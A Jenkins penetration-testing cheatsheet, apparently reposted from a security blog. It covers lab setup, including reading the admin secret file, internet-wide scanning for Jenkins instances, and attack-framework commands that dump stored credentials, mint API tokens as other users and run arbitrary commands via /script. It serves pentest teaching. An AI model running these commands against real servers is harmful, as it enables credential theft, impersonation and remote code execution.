Jenkins Penetration Test Cheatsheet
2024-12-23 13:27:0 Author: www.hackingdream.net(查看原文) 阅读量:7 收藏 
Setting up Test Environment 

sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \
  https://pkg.jenkins.io/debian/jenkins.io-2023.key
echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \
  https://pkg.jenkins.io/debian binary/ | sudo tee \
  /etc/apt/sources.list.d/jenkins.list > /dev/null
sudo apt-get update
sudo apt-get install jenkins

apt install openjdk-11-jdk

#Admin password
cat  /var/lib/jenkins/secrets/initialAdminPassword

#Access the server or use the server ip address 
http://127.0.0.1:8080 


Jenkins Scanner 

# Used to find Jenkins Instances over the internet/Intranet - Mass Host Discovery
download JenkinsScanner.sh from JenkinsVulnFinder 

#start the scan, Accessible Jenkins instances will be saved in a given filename
./JenkinsScanner.sh -i ip_list.txt -p 80,443,8443,8080,8010,8090,8085 -o jenkins_instances.txt

Jenkins Attack Framework

#Installation
git clone [email protected]:Accenture/jenkins-attack-framework.git 
cd jenkins-attack-framework
chmod +x jaf
sudo ./jaf --install
./jaf --install

#Check access, if creds are not provided, it tries anonymous access
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a User:user

#Auth check via Cookie - Append Cookie | Crumb headers as below (crumb is optional sometimes)
#This is useful when only SSO is allowed 
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a "JSESSIONID.b56cceb4=node01gv13h0gw8msto7tpp82pv499.node0|crumb=74366885010b4471c265872d42bcf5767773698bab0b49dc09d48dd8bfa0725e"

# View console output for the last build of every job that the user can see
python jaf.py ConsoleOutput  -s http://172.19.107.32:8080/ -a User:user

#Create API Token, Need privileges
python jaf.py CreateAPIToken  -s http://172.19.107.32:8080/ -a User:user

#Create an API Token on behalf of user `Bhanu`
python jaf.py CreateAPIToken  -s http://172.19.107.32:8080/ -a User:user --User Bhanu

# Dump Creds, require administrative credentials with /script access. 
python jaf.py DumpCreds -s http://172.19.107.32:8080/ -a Bhanu:Bhanu

# List API tokens for a given user ;  require administrative credentials with /script access. 
python jaf.py ListAPITokens  -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User

#List jobs 
python jaf.py ListJobs -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User

# Run any command, require administrative credentials with /script access. 
python jaf.py RunCommand  whoami -s http://172.19.107.32:8080/ -a Bhanu:Bhanu

文章来源: https://www.hackingdream.net/2024/12/jenkins-penetration-test-cheatsheet.html
如有侵权请联系:admin#unsafe.sh